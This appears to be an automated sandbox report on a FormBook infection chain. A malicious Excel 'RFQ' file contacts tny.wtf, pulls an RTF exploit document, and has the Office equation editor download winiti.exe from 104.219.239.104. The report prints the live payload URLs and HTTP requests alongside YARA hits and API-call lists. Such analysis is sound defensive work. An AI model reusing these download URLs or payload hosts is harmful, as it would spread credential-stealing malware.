00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fd 95 0e 00 00 00 00 00 48 00 00 00 02 00 05 00 04 05 01 00 4c 55 00 00 03 00 00 00 49 00 00 06 50 5a 01 00 d8 12 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a6 02 16 7d 02 00 00 04 02 72 01 00 00 70 7d 03 00 00 04 02 14 7d 05 00 00 04 02 28 15 00 00 0a 00 00 02 28 0f 00 00 06 00 2a c2 02 16 7d 02 00 00 04 02 72 01 00 00 70 7d 03 00 00 04 02 14 7d 05 00 00 04 02 28 15 00 00 0a 00 00 02 28 0f 00 00 06 00 02 03 7d 01 00 00 04 2a 00 1b 30 03 00 82 00 00 00 01 00 00 11 00 14 0a 00 72 03 00 00 70 73 16 00 00 0a 0a 06 6f 17 00 00 0a 00 72 ba 00 00 70 0b 07 06 73 18 00 00 0a 0c 73 19 00 00 0a 0d 08 73 1a 00 00 0a 13 04 11 04 09 6f 1b 00 00 0a 26 02 09 6f 1c 00 00 0a 16 6f 1d 00 00 0a 7d 04 00 00 04 02 7b 06 00 00 04 02 7b 04 00 00 04 6f 1e 00 00 0a 00 00 de 13 13 05 00 11 05 6f 1f 00 00 0a 28 20 00 00 0a 26 00 de 00 de 0a 00 06 6f 21 00 00 0a 00 00 dc 2a 00 00 01 1c 00 00 00 00 03 00 5f 62 00 13 20 00 00 01 02 00 03 00 74 77 00 0a 00 00 00 00 13 30 04 00 c2 00 00 00 02 00 00 11 00 02 7b 07 00 00 04 72 01 00 00 70 6f 22 00 00 0a 00 02 7b
              Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
              Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
              Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
              Source: Joe Sandbox ViewASN Name: DATAWAGONUS DATAWAGONUS
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: global trafficHTTP traffic detected: GET /dGa HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: tny.wtfConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xampp/bn/recreatednewthingswithentrienewprocesswhichwedidwithouthavingsuchagereatthigstodoever_______greatthingstohappened.doc HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 104.219.239.104Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /80/winiti.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 104.219.239.104Connection: Keep-Alive
              Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
              Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
              Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
              Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
              Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
              Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
              Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
              Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
              Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
              Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
              Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
              Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
              Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
              Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
              Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
              Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
              Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
              Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
              Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
              Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
              Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
              Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
              Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
              Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
              Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
              Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
              Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
              Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
              Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
              Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
              Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
              Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
              Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
              Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
              Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
              Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
              Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
              Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
              Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
              Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
              Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
              Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
              Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
              Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
              Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
              Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
              Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
              Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
              Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
              Source: unknownTCP traffic detected without corresponding DNS query: 104.219.239.104
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\37D00239.emfJump to behavior
              Source: global trafficHTTP traffic detected: GET /dGa HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: tny.wtfConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xampp/bn/recreatednewthingswithentrienewprocesswhichwedidwithouthavingsuchagereatthigstodoever_______greatthingstohappened.doc HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 104.219.239.104Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /80/winiti.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 104.219.239.104Connection: Keep-Alive
              Source: global trafficDNS traffic detected: DNS query: tny.wtf
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Jul 2024 11:40:21 GMTTransfer-Encoding: chunkedConnection: keep-aliveX-Powered-By: ASP.NETCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oUDIJoRUGvNJ0PNTuX7ZUsOG4uZhD8nTjir3U26jCZtfdcUpt6EmhafoL32hISzG0PbtgJUL0prVl%2Fji9sHwKu5fBApgukv%2Br9j%2Fzuq4ZC0URzfg%2BiMWXLxb"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8a941d47ceed5e79-EWRalt-svc: h3=":443"; ma=86400Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Jul 2024 11:40:21 GMTTransfer-Encoding: chunkedConnection: keep-aliveX-Powered-By: ASP.NETCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=plG0JCxoAKlGuo26MmlKyEXJVvVj%2Bf8tpWJBrWUSZ3eXFfejgYUVbeskNpEmJSH%2BakRDz19hd20DkL%2FpH1JaNAwp5VGCQQPRxFCVOvviqJ2ml9WAn2waQIV3"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8a941d4bd98e5e79-EWRalt-svc: h3=":443"; ma=86400Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Jul 2024 11:40:21 GMTTransfer-Encoding: chunkedConnection: keep-aliveX-Powered-By: ASP.NETCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4C56WPN0iN%2BgthEsRjYJrauRNBV%2Fd69qyhca%2BS7uZjfxTCL8Vo3zKLLqIuYan2fHzuwtUXcrHOw9DLlQOPcmMGD%2BkuYSBo2Vv%2Fzf2FhSQMa3CYQyt1MXo6V2"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8a941d4cca2b5e79-EWRalt-svc: h3=":443"; ma=86400Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Jul 2024 11:40:26 GMTTransfer-Encoding: chunkedConnection: keep-aliveX-Powered-By: ASP.NETCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2DK4%2FPYBA3If48iGooDP%2FeqPPqpoWJk9HuUhYKOLu4FxKJSb9kjv1sVS5SkTDG5iGgEFUGpvLyB0MYLuJxNFIpYgJowS%2FFE2o9HXFcYNFfo9Nom4%2BMylFrR%2B"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8a941d6abcb67ca2-EWRalt-svc: h3=":443"; ma=86400Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Jul 2024 11:40:26 GMTTransfer-Encoding: chunkedConnection: keep-aliveX-Powered-By: ASP.NETCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2DK4%2FPYBA3If48iGooDP%2FeqPPqpoWJk9HuUhYKOLu4FxKJSb9kjv1sVS5SkTDG5iGgEFUGpvLyB0MYLuJxNFIpYgJowS%2FFE2o9HXFcYNFfo9Nom4%2BMylFrR%2B"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8a941d6abcb67ca2-EWRalt-svc: h3=":443"; ma=86400Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
              Source: EQNEDT32.EXEString found in binary or memory: http://104.219.239.104/80/winiti.exe
              Source: EQNEDT32.EXE, 00000007.00000002.412730968.00000000005C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.219.239.104/80/winiti.exeRe
              Source: EQNEDT32.EXE, 00000007.00000002.412730968.00000000005C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.219.239.104/80/winiti.exej
              Source: EQNEDT32.EXE, 00000007.00000002.412730968.00000000005C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.219.239.104/80/winiti.exekkC:
              Source: EQNEDT32.EXE, 00000007.00000002.412730968.00000000005C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://104.219.239.104/80/winiti.exelay
              Source: tny.wtf.url.3.drString found in binary or memory: http://tny.wtf/
              Source: RFQ#51281AOLAI.xls, dGa.url.3.drString found in binary or memory: http://tny.wtf/dGa
              Source: 07330000.0.dr, ~DFA2DBDD95D657A82C.TMP.0.drString found in binary or memory: http://tny.wtf/dGayX

              E-Banking Fraud

              barindex
              Yara detected FormBook
              Source: Yara matchFile source: 9.2.winiti.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.winiti.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000009.00000002.489032107.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.488998294.0000000000150000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 9.2.winiti.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 9.2.winiti.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000009.00000002.489032107.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: 00000009.00000002.488998294.0000000000150000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\recreatednewthingswithentrienewprocesswhichwedidwithouthavingsuchagereatthigstodoever_______greatthingstohappened[1].doc, type: DROPPEDMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FFE27256.doc, type: DROPPEDMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
              Excel sheet contains many unusual embedded objects
              Source: RFQ#51281AOLAI.xlsOLE: Microsoft Excel 2007+
              Source: 07330000.0.drOLE: Microsoft Excel 2007+
              Source: ~DF6D5A74146301A5A1.TMP.0.drOLE: Microsoft Excel 2007+
              Microsoft Office drops suspicious files
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\dGa.urlJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\tny.wtf.urlJump to behavior
              Office equation editor drops PE file
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\winiti[1].exeJump to dropped file
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\winiti.exeJump to dropped file
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
              Source: C:\Users\user\AppData\Roaming\winiti.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
              Source: C:\Users\user\AppData\Roaming\winiti.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0042BEE3 NtClose,9_2_0042BEE3
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_008E07AC NtCreateMutant,LdrInitializeThunk,9_2_008E07AC
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_008DF9F0 NtClose,LdrInitializeThunk,9_2_008DF9F0
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_008DFAE8 NtQueryInformationProcess,LdrInitializeThunk,9_2_008DFAE8
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_008DFB68 NtFreeVirtualMemory,LdrInitializeThunk,9_2_008DFB68
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_008DFDC0 NtQuerySystemInformation,LdrInitializeThunk,9_2_008DFDC0
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_008E00C4 NtCreateFile,9_2_008E00C4
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_008E0048 NtProtectVirtualMemory,9_2_008E0048
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_008E0060 NtQuerySection,9_2_008E0060
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_008E0078 NtResumeThread,9_2_008E0078
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_008E01D4 NtSetValueKey,9_2_008E01D4
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_008E010C NtOpenDirectoryObject,9_2_008E010C
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_008E0C40 NtGetContextThread,9_2_008E0C40
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_008E10D0 NtOpenProcessToken,9_2_008E10D0
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_008E1148 NtOpenThread,9_2_008E1148
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_008DF8CC NtWaitForSingleObject,9_2_008DF8CC
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_008DF900 NtReadFile,9_2_008DF900
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_008DF938 NtWriteFile,9_2_008DF938
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_008E1930 NtSetContextThread,9_2_008E1930
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_008DFAB8 NtQueryValueKey,9_2_008DFAB8
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_008DFAD0 NtAllocateVirtualMemory,9_2_008DFAD0
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_008DFA20 NtQueryInformationFile,9_2_008DFA20
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_008DFA50 NtEnumerateValueKey,9_2_008DFA50
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_008DFBB8 NtQueryInformationToken,9_2_008DFBB8
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_008DFBE8 NtQueryVirtualMemory,9_2_008DFBE8
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_008DFB50 NtCreateKey,9_2_008DFB50
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_008DFC90 NtUnmapViewOfSection,9_2_008DFC90
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_008DFC30 NtOpenProcess,9_2_008DFC30
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_008DFC48 NtSetInformationFile,9_2_008DFC48
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_008DFC60 NtMapViewOfSection,9_2_008DFC60
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_008DFD8C NtDelayExecution,9_2_008DFD8C
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_008E1D80 NtSuspendThread,9_2_008E1D80
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_008DFD5C NtEnumerateKey,9_2_008DFD5C
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_008DFEA0 NtReadVirtualMemory,9_2_008DFEA0
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_008DFED0 NtAdjustPrivilegesToken,9_2_008DFED0
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_008DFE24 NtWriteVirtualMemory,9_2_008DFE24
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_008DFFB4 NtCreateSection,9_2_008DFFB4
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_008DFFFC NtCreateProcessEx,9_2_008DFFFC
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_008DFF34 NtQueueApcThread,9_2_008DFF34
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 8_2_002C04C88_2_002C04C8
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 8_2_002C3D988_2_002C3D98
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 8_2_002C11688_2_002C1168
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 8_2_002C3B388_2_002C3B38
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 8_2_00BD22308_2_00BD2230
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 8_2_00BD22208_2_00BD2220
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 8_2_00BD19B18_2_00BD19B1
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 8_2_00BD1DE88_2_00BD1DE8
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 8_2_00BD19C08_2_00BD19C0
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 8_2_00BD27188_2_00BD2718
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 8_2_00BD27098_2_00BD2709
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 8_2_00BD2B508_2_00BD2B50
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 8_2_00BD2B408_2_00BD2B40
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_004014209_2_00401420
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_004010009_2_00401000
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_004011549_2_00401154
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_004011609_2_00401160
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_00416A4E9_2_00416A4E
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_00416A539_2_00416A53
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0040FCCB9_2_0040FCCB
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0040FCD39_2_0040FCD3
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0042E5239_2_0042E523
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0040FEF39_2_0040FEF3
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0040DF739_2_0040DF73
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_00402FD09_2_00402FD0
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_008EE0C69_2_008EE0C6
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_008EE2E99_2_008EE2E9
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009963BF9_2_009963BF
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009163DB9_2_009163DB
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_008F23059_2_008F2305
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0093A37B9_2_0093A37B
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0097443E9_2_0097443E
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0090C5F09_2_0090C5F0
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009705E39_2_009705E3
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009365409_2_00936540
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_008F46809_2_008F4680
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_008FE6C19_2_008FE6C1
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0093A6349_2_0093A634
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009926229_2_00992622
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_008FC7BC9_2_008FC7BC
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_008FC85C9_2_008FC85C
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0091286D9_2_0091286D
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0099098E9_2_0099098E
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_008F29B29_2_008F29B2
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009849F59_2_009849F5
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009069FE9_2_009069FE
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0093C9209_2_0093C920
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0099CBA49_2_0099CBA4
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_00976BCB9_2_00976BCB
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_00992C9C9_2_00992C9C
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0097AC5E9_2_0097AC5E
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_00920D3B9_2_00920D3B
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_008FCD5B9_2_008FCD5B
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_00922E2F9_2_00922E2F
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0090EE4C9_2_0090EE4C
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0098CFB19_2_0098CFB1
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_00962FDC9_2_00962FDC
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_00900F3F9_2_00900F3F
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0091D0059_2_0091D005
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0090905A9_2_0090905A
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_008F30409_2_008F3040
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0096D06D9_2_0096D06D
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0097D13F9_2_0097D13F
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009912389_2_00991238
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_008EF3CF9_2_008EF3CF
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_008F73539_2_008F7353
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009254859_2_00925485
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009014899_2_00901489
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0092D47D9_2_0092D47D
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009935DA9_2_009935DA
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_008F351F9_2_008F351F
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0097579A9_2_0097579A
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009257C39_2_009257C3
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0098771D9_2_0098771D
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0096F8C49_2_0096F8C4
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0098F8EE9_2_0098F8EE
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009759559_2_00975955
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0097394B9_2_0097394B
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_009A3A839_2_009A3A83
              Source: C:\Users\user\AppData\Roaming\winiti.exeCode function: 9_2_0097DBDA9_2_0097DBDA
